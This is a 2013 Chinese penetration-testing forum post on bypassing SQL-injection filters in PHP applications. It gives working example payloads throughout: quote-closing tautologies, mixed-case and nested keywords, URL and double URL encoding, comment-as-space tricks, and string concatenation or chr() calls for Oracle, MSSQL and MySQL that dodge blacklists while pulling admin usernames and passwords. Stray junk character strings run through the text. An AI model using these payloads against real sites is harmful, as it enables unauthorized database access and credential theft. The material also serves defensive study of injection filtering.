中国网络渗透测试联盟

标题: PHP中SQL注入,绕开过滤,照样注入 [打印本页]
作者: admin    时间: 2013-1-13 09:50
标题: PHP中SQL注入,绕开过滤,照样注入
SQL注入。有攻有防。知道进攻。才懂得防守.
% C7 E' a9 M# N$ y% [
0 W. b5 h4 ?4 F  P# E) X有的时候,很容易受到SQL注入攻击的程序,可能会进行输入过滤,用来防止攻击者无限制的利用其中存在的设计缺陷。( B4 o/ p% H5 h8 I! X9 E! E
- D, [$ F( E4 Y$ d4 ]2 k  i
唱出会删除或者净化一些字符,或者阻止常用的sql关键词。; C6 K9 V* K  y2 Z# N

/ @8 Q$ D" h$ W( [0 C4 ~! _我们通常有以下几种技巧,去避开这些过滤。
8 C3 W) ]( L+ p! U9 T2 [/ {) ~  U, L! `* n% Y8 l# E& L0 j8 A$ y
1,避免使用被阻止的字符,即不使用这些字符仍然达到攻击目的。
, H& }  N1 J% r0 b" b8 O2 `: y
( A( S" j$ M8 P0 D! C8 r$ V9 S: l( l% sA,如果注入一个数字数据字段,就不需要使用单引号。
  h! Z% b. m. c( P: C* c6 R$ p+ k0 H" _# H( ^& [& |
B,输入注释符号被阻止使用,我们可以设计注入的数据,既不破坏周围的查询语法。2 A, L$ M. c' v( v
! A  e! k- h$ H' w: [
比如, ?id=1′ 这里存在注入,过滤了注释符合,我们可以输入 ?id=1′ or ‘a’=’a
- u$ P/ ~/ p0 u* U3 q
; h0 H2 u/ `/ w9 {1 u目的其实很简单,就是把后面的单引号给闭合掉。* H6 F: E; w/ x* ]2 d

) e/ u1 \! U0 TC,在一个MSSQL注入中注入批量查询的时候,不必使用分号分隔符。' r: h! u8 N6 X2 C+ ?" }

/ }' z% u* M2 E) f' x! O只要纠正所有批量查询的语法,无论你是否使用分号,查询的解析器依然能正确的去解释它们的。
: C4 |, a) v8 X; O, R* }9 D' z4 E5 c6 j( F, a' i0 J! g9 h1 s8 U
2,避免使用简单确认
) s8 ?0 ]$ `% ^$ h4 R: x& I: s3 f6 N) z% C& Z, G6 u+ t
一些输入确认机制使用一个简单的黑名单,组织或删除任何出现在这个名单中的数据,比如防注入程序。6 E% T. ^1 F4 h; I/ a# W

) N+ H2 x/ N. B* R/ k/ K这一般要看这个机制是否做的足够的好了,黑名单是否足够能确保安全。如果只是简单的黑名单,那也有机会突破的。; L9 j6 F$ L8 ~" P
4 G8 i' G2 o; d0 F
A,如果select关键词被阻止或删除( i3 o. c) h* v. e3 P
' x' n5 u# ~6 D& u4 p
我们可以输入:0 A" F# [4 G* O

' K/ z, A$ m( T$ N5 oSeLeCt       注意大小写
! D! q# D& i0 h( t
: \6 d5 [& V& o9 w! l  G; O' dselselectect    还记得ewebeditor是怎么过滤asp的么?. P2 T4 Q- v, d+ t& U: P5 ~
4 w! b% t5 Z& H. Q* x& S
%53%45%4c%45%43%54                        URL编码; D0 I: h( g* s* X# O- `; I
( R4 j( w- g. c4 \" Y0 d- k* M
%2553%2545%254c%2545%2543%2554    对上面的每个%后加了一个25
2 D4 w5 K$ \; g% R
; z) J  J  Y4 x& e1 T3,使用SQL注释符
8 u& z4 D# ]# q* b! L1 `; U
7 C/ f& W& M8 a% H- m7 m+ E2 ]' z' SA,使用注释来冒充注入的数据中的空格。- Z) U0 `! Z, q& {# m( u% G
, G! ~: \& J& j) Z
select/*yesu*/username,password/*yesu*/from/*yesu*/admin
0 W+ ~  k' Q6 H
' @0 P5 X" x6 ~$ S, Q/*yesu*/来冒充空格
& V, n9 h+ z; y: w2 t* c. w
- G5 c4 `2 m* gB,使用注释来避开某些注入的确认过滤。9 n4 i; ~. q; d& r! P

1 y6 b; D/ L, p$ `: RSEL/*yesu*/ECT username,password fr/*yesu*/om admin! Y+ x/ ]& L$ B( f& ~+ a1 P

/ @3 p3 n' u  i4,处理被阻止的字符串) t4 M+ i$ ]& d) E3 ]: X/ }
3 C# X  n2 z* o( A% \, y: W
比如,程序阻止了admin,因为怕攻击者注入admin表单中的数据。
/ X& w% ~9 C4 K( a' @) C* {) J5 s
) e9 I  s& c0 h* h. F# t我们可以这样
! O% I% t' M9 l' y1 r% P
4 x' t, G+ a5 w. ^/ N) NA,oracle数据库: ‘adm’||’in’
0 K! n) F- R7 e, g4 u7 P6 i7 V+ F; M
B,MSSQL数据库: ‘adm’+’in’/ n0 P( \4 [- ]" t9 `

2 H7 f' @2 Q8 S3 w  s( ~" \, q; LC,MYSQL数据库: concat (‘adm’,’in’)) Q( \* G' p. D  @7 j
) R1 u/ U8 V: u' C4 s/ J
D,oracle中如果单引号被阻止了,还可以用chr函数, K- }! _# P4 q' v2 c9 K4 Z

9 B" C( B( Q4 ?+ ^# r! n7 t, Asleect password from admin where username = char(97) || chr(100) || chr(109) || chr(105) || chr(110)
5 b) m, E4 F$ Q1 x( |2 q/ e! _3 J& n* x, h
还有其他方法。正在收集中.
7 A" c# Y$ b% o% I9 o: Y
4 W8 n  q1 T! ], z9 G7 s" h



欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2